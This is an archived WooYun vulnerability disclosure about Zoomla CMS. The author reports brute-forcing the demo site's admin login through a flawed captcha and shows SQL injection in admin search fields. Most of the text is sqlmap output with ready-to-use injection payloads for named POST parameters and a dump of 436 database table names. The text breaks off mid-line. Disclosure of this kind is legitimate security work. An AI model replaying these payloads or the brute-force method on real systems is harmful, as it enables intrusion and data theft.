乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-05: 细节已通知厂商并且等待厂商处理中 2014-08-06: 厂商已经确认,细节仅向厂商公开 2014-08-09: 细节向第三方安全合作伙伴开放 2014-09-30: 细节向核心白帽子及相关领域专家公开 2014-10-10: 细节向普通白帽子公开 2014-10-20: 细节向实习白帽子公开 2014-11-03: 细节向公众公开
RT
问题有两个:1.验证码设计不当可暴力猜解后台管理员账户密码;2.后台多处注入漏洞(搜索处)可获取各种敏感信息。
#1.验证码设计不当逐浪后台地址:http://demo.zoomla.cn/Admin/login.aspx一开始是没有验证码的,所以我爆破,但是发现会提示验证码错误。填上验证码抓包继续对密码字段爆破,发现可以爆破成功。
成功进入后台:
#2.大面积的SQL注入漏洞:a.首先是商品管理搜索处
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #1* Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4 Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4---web server operating system: Windows 8.1 or 2012 R2web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5back-end DBMS: Microsoft SQL Server 2008current database: 'demozoomla'
436个表:
Database: demozoomla[436 tables]+-----------------------------------+| ZL_3DMusic || ZL_3DPanoramic || ZL_3DShop || ZL_Accountinfo || ZL_AdZone || ZL_Adbuy || ZL_AddRessList || ZL_Advertisement || ZL_Agent || ZL_Allianceinfo || ZL_Answer || ZL_Answer_Recode || ZL_App || ZL_Arrive || ZL_ArticleOrders || ZL_ArticlePromotion || ZL_Ask || ZL_AskCommon || ZL_Auction || ZL_AuditingState || ZL_Author || ZL_Baike || ZL_BaikeEdit || ZL_Bbscate || ZL_Bbstips || ZL_BiaoQian || ZL_Bid || ZL_Bider || ZL_BigLog || ZL_BindFlolar || ZL_BindPro || ZL_BlogAnswer || ZL_BlogAsk || ZL_BlogContent || ZL_BlogLiving || ZL_BookRead || ZL_BossInfo || ZL_C_Announce || ZL_C_Article || ZL_C_Factory || ZL_C_FriendSite || ZL_C_Info || ZL_C_Photo || ZL_C_Plugins || ZL_C_RedirectLink || ZL_C_soft || ZL_C_video || ZL_CallNode || ZL_CallNote || ZL_Card || ZL_CardType || ZL_Cart || ZL_CartPro || ZL_Cash || ZL_ChangeProduct || ZL_ChangeTalk || ZL_Chart || ZL_Chat || ZL_Class || ZL_ClassRoom || ZL_ClientRequire || ZL_Client_Additional || ZL_Client_Basic || ZL_Client_Enterprise || ZL_Client_Penson || ZL_CollectionInfo || ZL_CollectionItem || ZL_Comment || ZL_Commodities || ZL_CommonModel || ZL_CompSecretary || ZL_Compete || ZL_CompleteHistory || ZL_ComponentClass || ZL_ComponentPlatform || ZL_Content_ScheTask || ZL_Correct || ZL_Count_Browser || ZL_Count_Iplocal || ZL_Count_Local || ZL_Count_Month || ZL_Count_Os || ZL_Count_Site || ZL_Count_Visitor || ZL_Count_Year || ZL_Count_dtproperties || ZL_Course || ZL_Courseware || ZL_CpsClick || ZL_CreateJS || ZL_CrmAuthList || ZL_CustomerService || ZL_DataList || ZL_DataSource || ZL_Datadic || ZL_Datadiccategory || ZL_Defray || ZL_Delivier || ZL_DocList || ZL_DocModel || ZL_DocPermission || ZL_DownServer || ZL_EditWord || ZL_EnrollList || ZL_ExAnswer || ZL_ExAttendance || ZL_ExChange || ZL_ExClassgroup || ZL_ExLecturer || ZL_ExStudent || ZL_ExStudytime || ZL_ExTeacher || ZL_ExamPoint || ZL_Exam_Class || ZL_Exam_Sys_Papers || ZL_Exam_Sys_Questions || ZL_Exam_Type || ZL_Examination || ZL_Examinee || ZL_Exroom || ZL_FTPConfig || ZL_Favorite || ZL_File || ZL_Flow || ZL_Frient || ZL_GiftCard_User || ZL_GiftCard_shop || ZL_Grade || ZL_GradeCate || ZL_Group || ZL_GroupBuy || ZL_GroupBuyList || ZL_GroupFieldPermissions || ZL_GroupModel || ZL_GuestAnswer || ZL_Guestbook || ZL_Guestcate || ZL_HidTopic || ZL_Hits || ZL_Honor || ZL_IDC_DBList || ZL_IDC_DNSSubDom || ZL_IDC_DNSTable || ZL_IDC_DomainList || ZL_IDC_DomainLog || ZL_IDC_DomainPrice || ZL_IDC_DomainTemp || ZL_IDC_Log || ZL_IDC_Server || ZL_IDC_SiteList || ZL_IPUrl || ZL_IPclass || ZL_IPpara || ZL_IServer || ZL_IServerReply || ZL_Interlocution || ZL_InviteRecord || ZL_InvtoType || ZL_Keyword || ZL_Keywords || ZL_LinkName || ZL_Log || ZL_MTit || ZL_Magazine || ZL_MailIdiograph || ZL_MailInfo || ZL_MailManage || ZL_MailReceive || ZL_MailSet || ZL_MailTemp || ZL_MailType || ZL_Manager || ZL_Manufacturers || ZL_Map || ZL_MbClass || ZL_MbComment || ZL_MbTheme || ZL_Mbtopic || ZL_Message || ZL_MiUserInfo || ZL_Microb || ZL_Mis || ZL_MisApproval || ZL_MisAttendance || ZL_MisInfo || ZL_MisPlan || ZL_MisProLevel || ZL_MisProcedure || ZL_MisSign || ZL_MisType || ZL_Mis_AppProg || ZL_Mis_Model || ZL_Model || ZL_ModelField || ZL_MoneyManage || ZL_MuClass || ZL_MuPage || ZL_MuPic || ZL_MuProduct || ZL_MuTemp || ZL_MultiNode || ZL_MySubscription || ZL_Node || ZL_NodeBindDroit || ZL_NodeRole || ZL_Node_ModelTemplate || ZL_OAC_111 || ZL_OA_BC || ZL_OA_Document || ZL_OA_FreePro || ZL_OA_PBTable || ZL_OA_Sign || ZL_OA_UserConfig || ZL_Online || ZL_OnlineCusServ || ZL_OnlineUsers || ZL_OrderBaseField || ZL_OrderDelivery || ZL_OrderSql || ZL_Order_LuckCode || ZL_Order_PayLog || ZL_Orderinfo || ZL_P_Shop || ZL_Package || ZL_Page || ZL_PageReg || ZL_PageStyle || ZL_PageTemplate || ZL_Page_Content || ZL_Page_fwefw || ZL_Paper_Questions || ZL_Papers_System || ZL_Papers_User || ZL_Passenger || ZL_PayPlat || ZL_Payment || ZL_Permission || ZL_Plan || ZL_PlanSql || ZL_PointGrounp || ZL_PointRecord || ZL_PointTrans || ZL_Present || ZL_Print || ZL_PrintMode || ZL_PrintPic || ZL_PrintType || ZL_Process || ZL_Processes || ZL_Project || ZL_ProjectAffairs || ZL_ProjectBaseField || ZL_ProjectCategory || ZL_ProjectDiscuss || ZL_ProjectField || ZL_ProjectType || ZL_ProjectWork || ZL_Projects || ZL_ProjectsBase || ZL_ProjectsComments || ZL_PromoCount || ZL_Promotion || ZL_Promotions || ZL_Pub || ZL_Pub_TW || ZL_Pub_WTHD || ZL_Pub_WZTP || ZL_Pub_ZJDA || ZL_Pub_ZXDC || ZL_Pub_huodong || ZL_QrCode || ZL_Question || ZL_Questions || ZL_Questions_Class || ZL_Questions_Knowledge || ZL_Questions_Type || ZL_Questions_User || ZL_RebateOrder || ZL_Rebates || ZL_Recruitment || ZL_RedEnvelope || ZL_Redindulgence || ZL_Reg_Page || ZL_Regsterapi || ZL_Result || ZL_Role || ZL_RolePermissions || ZL_RoomActive || ZL_RoomActiveJoin || ZL_RoomCall || ZL_RoomInfo || ZL_RoomMessage || ZL_RoomNotify || ZL_RoomUpFile || ZL_RoomUser || ZL_SQL || ZL_S_FloGoods || ZL_S_FloPack || ZL_S_shop || ZL_Scheme || ZL_SchemeInfo || ZL_School || ZL_ScoreStatics || ZL_Search || ZL_Sensitivity || ZL_ServiceSeat || ZL_SettlementInfoList || ZL_ShopCommentary || ZL_ShopCompete || ZL_ShopGrade || ZL_ShopLable || ZL_ShopNodeinfo || ZL_Shopconfig || ZL_Shopsearch || ZL_Shopsite || ZL_ShopsiteClass || ZL_SitePas || ZL_SitePicAdv || ZL_SiteTextAdv || ZL_Sns_Active || ZL_Sns_ActiveJoin || ZL_Sns_ActivePic || ZL_Sns_ActiveType || ZL_Sns_BlogStyleTable || ZL_Sns_BookTable || ZL_Sns_CarConfig || ZL_Sns_CarLog || ZL_Sns_Carlist || ZL_Sns_ChatLog || ZL_Sns_CollectTable || ZL_Sns_CommendCommentOn || ZL_Sns_CommentAll || ZL_Sns_FileShare || ZL_Sns_GSHuatee || ZL_Sns_GSReverCricicism || ZL_Sns_GSRoom || ZL_Sns_GSType || ZL_Sns_GatherStrain || ZL_Sns_GroupPicCateg || ZL_Sns_HomeCollocate || ZL_Sns_HomeHeadCollocate || ZL_Sns_Kiss || ZL_Sns_Log || ZL_Sns_LogCriticism || ZL_Sns_LookLog || ZL_Sns_LotMessage || ZL_Sns_LotNote || ZL_Sns_Memo || ZL_Sns_Messageboard || ZL_Sns_MyCar || ZL_Sns_MyPose || ZL_Sns_PicCateg || ZL_Sns_PicCritique || ZL_Sns_PicTure || ZL_Sns_ProductTable || ZL_Sns_ProductTypetable || ZL_Sns_ReplayLog || ZL_Sns_Report || ZL_Sns_SystemBannerTable || ZL_Sns_SystemLog || ZL_Sns_UserLog || ZL_Sns_UserLogType || ZL_Sns_UserMoreinfo || ZL_Sns_UserShopProduct || ZL_Sns_User_R_GS || ZL_Sns_User_R_Module || ZL_Sns_blogTable || ZL_Source || ZL_SpecCate || ZL_SpecInfo || ZL_Special || ZL_Stock || ZL_StoreStyleTable || ZL_Store_reg || ZL_Structure || ZL_Student || ZL_SubscriptionCount || ZL_Survey || ZL_Trademark || ZL_UAgent || ZL_U_comp || ZL_U_jl || ZL_U_zp || ZL_Ucenter || ZL_UnionInfo || ZL_User || ZL_UserApp || ZL_UserBase || ZL_UserBaseField || ZL_UserCaritHis || ZL_UserCart || ZL_UserCartPro || ZL_UserClass || ZL_UserCoinHis || ZL_UserCourse || ZL_UserDay || ZL_UserExpDomP || ZL_UserExpHis || ZL_UserFave || ZL_UserFriendGroup || ZL_UserFriendTable || ZL_UserGrade || ZL_UserGroup || ZL_UserOrderinfo || ZL_UserPromotions || ZL_UserPurview || ZL_UserRecei || ZL_UserRegisterIP || ZL_UserRoom || ZL_UserShop || ZL_UserStock || ZL_UserStoreTable || ZL_UserStoreTypeTable || ZL_VJobInfo || ZL_VResume || ZL_VRoom || ZL_VideoHall || ZL_VideoHouse || ZL_VideoHouseApply || ZL_VideoInfo || ZL_VideoMessage || ZL_VideoRoom || ZL_VideoUser || ZL_VideoUserFriend || ZL_VideoUserGroup || ZL_View || ZL_ViewHistory || ZL_WapArticle || ZL_WorkRole || ZL_Zone_Advertisement || ZL_Zone_Node || ZL_Zone_Site || ZL_Zone_question || ZL_page_app || ZL_wxMsg || demozoomla_f.ZL_Content_WordChain |+-----------------------------------+
b.访问评价处:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: (custom) POSTParameter: #1* Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTTARGET"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTARGUMENT"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__LASTFOCUS"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__VIEWSTATE"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------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTitle"123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'='------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTime"2014-08------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$btnSeach"??��������------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"10------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"1------WebKitFormBoundary5n6dB9dFzpkAYygr-- Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTTARGET"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__EVENTARGUMENT"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__LASTFOCUS"------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="__VIEWSTATE"/wEPDwULLTExMTY3NDAzODcPFgQeBnN0YXR1cwJjHgV0aXRsZWUWAmYPZBYCAgMPZBYEAgEPZBYCAgEPFgIeBFRleHQFjQE8bGk+PGEgaHJlZj0nL0FkbWluL0kvTWFpbi5hc3B4Jz7lt6XkvZzlj7A8L2E+PC9saT48bGk+PGEgaHJlZj0nQ29udGVudE1hbmFnZS5hc3B4Jz7lhoXlrrnnrqHnkIY8L2E+PC9saT48bGkgY2xhc3M9J2FjdGl2ZSc+6K6/6Zeu6K+E5Lu3PC9saT5kAgMPZBYEAgMPDxYCHwIFAjI0ZGQCBA88KwARAwAPFgYeC18hRGF0YUJvdW5kZx4QVmlydHVhbEl0ZW1Db3VudAIgHgtfIUl0ZW1Db3VudAIgZAEQFgAWABYADBQrAAAWAmYPZBYYAgEPZBYOZg9kFgJmDxUBAjMzZAIBDw8WAh8CBQIzM2RkAgIPZBYCZg8VARMyMDE0LTA4LTAxIDEwOjA2OjM2ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIV6YCQ5rWq5Lqn5ZOB5bGV56S65Yy6FemAkOa1quS6p+WTgeWxleekuuWMumQCBQ8PFgIfAgUPMTE0LjI0OS4xMjAuMTcwZGQCBg9kFgJmDxUBCeW+heehruiupGQCAg9kFg5mD2QWAmYPFQECMzRkAgEPDxYCHwIFAjM0ZGQCAg9kFgJmDxUBEzIwMTQtMDgtMDEgMTA6NTE6MTJkAgMPDxYCHwIFBiZuYnNwO2RkAgQPZBYCZg8VAhXpgJDmtarkuqflk4HlsZXnpLrljLoV6YCQ5rWq5Lqn5ZOB5bGV56S65Yy6ZAIFDw8WAh8CBQ4xMDEuMjI2LjMzLjIyM2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgMPZBYOZg9kFgJmDxUBAjM1ZAIBDw8WAh8CBQIzNWRkAgIPZBYCZg8VARMyMDE0LTA4LTAxIDE2OjU1OjIzZAIDDw8WAh8CBQR0ZXN0ZGQCBA9kFgJmDxUCG+WkmumXqOaIt+WtkOermeWIh+aNouezu+e7nxvlpJrpl6jmiLflrZDnq5nliIfmjaLns7vnu59kAgUPDxYCHwIFDTU4LjIxNS4yMjAuNjJkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIED2QWDmYPZBYCZg8VAQIzNmQCAQ8PFgIfAgUCMzZkZAICD2QWAmYPFQETMjAxNC0wOC0wMSAxNjo1NjoxMmQCAw8PFgIfAgUGJm5ic3A7ZGQCBA9kFgJmDxUCFemAkOa1quS6p+WTgeWxleekuuWMuhXpgJDmtarkuqflk4HlsZXnpLrljLpkAgUPDxYCHwIFDDIxOS4yMzkuOTYuM2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgUPZBYOZg9kFgJmDxUBAjM3ZAIBDw8WAh8CBQIzN2RkAgIPZBYCZg8VARMyMDE0LTA4LTAyIDA4OjQ1OjA1ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIk5Y2D5LiH57qn5pWw5o2u5bqT6LSf6L295rWL6K+V57qn5YirJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIq2QCBQ8PFgIfAgUMMTQuMTE4LjU1Ljc2ZGQCBg9kFgJmDxUBCeW+heehruiupGQCBg9kFg5mD2QWAmYPFQECMzhkAgEPDxYCHwIFAjM4ZGQCAg9kFgJmDxUBEzIwMTQtMDgtMDIgMDk6MzE6MjVkAgMPDxYCHwIFBiZuYnNwO2RkAgQPZBYCZg8VAhvlpJrpl6jmiLflrZDnq5nliIfmjaLns7vnu58b5aSa6Zeo5oi35a2Q56uZ5YiH5o2i57O757ufZAIFDw8WAh8CBQ4xMTYuMjA3LjU1LjIxMGRkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgcPZBYOZg9kFgJmDxUBAjM5ZAIBDw8WAh8CBQIzOWRkAgIPZBYCZg8VARMyMDE0LTA4LTAyIDA5OjQ4OjIxZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIb5aSa6Zeo5oi35a2Q56uZ5YiH5o2i57O757ufG+WkmumXqOaIt+WtkOermeWIh+aNouezu+e7n2QCBQ8PFgIfAgUOMTAxLjIyNi41MS4yMjhkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIID2QWDmYPZBYCZg8VAQI0MGQCAQ8PFgIfAgUCNDBkZAICD2QWAmYPFQETMjAxNC0wOC0wMiAyMDowNToyOWQCAw8PFgIfAgUFYWRtaW5kZAIED2QWAmYPFQIn6J6N6IGa56e75Yqo5bqU55So5LiO5qGM6Z2i6L2v5Lu25bmz5Y+wJ+iejeiBmuenu+WKqOW6lOeUqOS4juahjOmdoui9r+S7tuW5s+WPsGQCBQ8PFgIfAgULNTguNTAuMTQuOTlkZAIGD2QWAmYPFQEJ5b6F56Gu6K6kZAIJD2QWDmYPZBYCZg8VAQI0MWQCAQ8PFgIfAgUCNDFkZAICD2QWAmYPFQETMjAxNC0wOC0wMyAwNDoyMzo1NWQCAw8PFgIfAgUGJm5ic3A7ZGQCBA9kFgJmDxUCJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIqyTljYPkuIfnuqfmlbDmja7lupPotJ/ovb3mtYvor5XnuqfliKtkAgUPDxYCHwIFDzE4MC4xNTMuMjA1LjI1M2RkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgoPZBYOZg9kFgJmDxUBAjQyZAIBDw8WAh8CBQI0MmRkAgIPZBYCZg8VARMyMDE0LTA4LTAzIDA0OjIzOjU1ZAIDDw8WAh8CBQYmbmJzcDtkZAIED2QWAmYPFQIk5Y2D5LiH57qn5pWw5o2u5bqT6LSf6L295rWL6K+V57qn5YirJOWNg+S4h+e6p+aVsOaNruW6k+i0n+i9vea1i+ivlee6p+WIq2QCBQ8PFgIfAgUNMTQuMTA3LjIwNS45MWRkAgYPZBYCZg8VAQnlvoXnoa7orqRkAgsPDxYCHgdWaXNpYmxlaGRkAgwPZBYCZg9kFgQCAQ8PFgIfAgUCMzJkZAIWDxAPFgIfA2dkEBUEATEBMgEzATQVBAExATIBMwE0FCsDBGdnZ2cWAWZkGAEFEWN0bDAwJENvbnRlbnQkRWd2DzwrAAwDBhUBAklEBxQrAAoUKwABAiEUKwABAiIUKwABAiMUKwABAiQUKwABAiUUKwABAiYUKwABAicUKwABAigUKwABAikUKwABAioIAgRkmIUN+QajY8XCYHl94YGf479+Juhbv5otzNBlCeQ9aRk=------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTitle"123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$txtTime"2014-08------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$btnSeach"??��������------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"10------WebKitFormBoundary5n6dB9dFzpkAYygrContent-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"1------WebKitFormBoundary5n6dB9dFzpkAYygr-- Type: stacked queries Title: Microsoft 